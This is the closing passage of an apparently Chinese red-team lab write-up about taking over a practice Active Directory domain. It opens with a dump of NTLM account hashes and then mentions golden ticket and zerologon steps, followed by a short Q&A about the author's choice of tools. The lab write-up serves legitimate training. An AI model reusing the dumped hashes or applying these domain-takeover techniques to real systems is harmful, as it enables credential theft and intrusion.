129:aad3b435b51404eeaad3b435b51404ee:82a28aff9a3be5385b87c4928b54a66f:::redteam.red\apt404:1130:aad3b435b51404eeaad3b435b51404ee:ba0b26eb2595bc0a639d986537433e5d:::redteam.red\adduser:1131:aad3b435b51404eeaad3b435b51404ee:168df3659b5f75ab35645606839e5677:::redteam.red\saul:1135:aad3b435b51404eeaad3b435b51404ee:518b98ad4178a53695dc997aa02d455c:::OWA$:1000:aad3b435b51404eeaad3b435b51404ee:8623dc75ede3ca9ec11f2475b12ef96d:::SQLSERVER-2008$:1127:aad3b435b51404eeaad3b435b51404ee:2dae08cafb67b4537b7d5871084c961d:::WORK-7$:1138:aad3b435b51404eeaad3b435b51404ee:f085f13639b3de3c78de926c0719d36d:::

Golden ticket

09c85cc6741fae5b086c6aa1431667e2.webppic147-黄金票据

Finally

f8dd224575474260865b6fd46e2a5382.webppic148-GOT DC最后

1.Outlook邮服的那个攻击路径就不去试了,那个比较容易,知道有那样的洞就可以了,不然我直接zerologon就撸穿了(因为这是靶场)2.如果你有更好的攻击方法,也可以通过私聊与我分享3.大牛的github:https://github.com/n00B-ToT4.如果可以,也可以关注一下我的Github:https://github.com/XiaoliChan

Q&A:

1.Q: 为什么不选择用CS/MSF? A: 为什么我要用CS/MSF打靶场?2.Q: 文中的相关工具有链接嘛? A: 无3.Q: 为什么不用fscan呢? A: 自从看到某人用该工具疯狂扫内网之后,就不太想用了。工具很好,没问题,但是我觉得打靶场不需要4.Q: 为什么不用FRP呢? A: 个人不喜欢


浏览 432
点赞
评论
收藏
分享

手机扫一扫分享

分享
举报
评论
图片
表情
推荐
点赞
评论
收藏
分享

手机扫一扫分享

分享
举报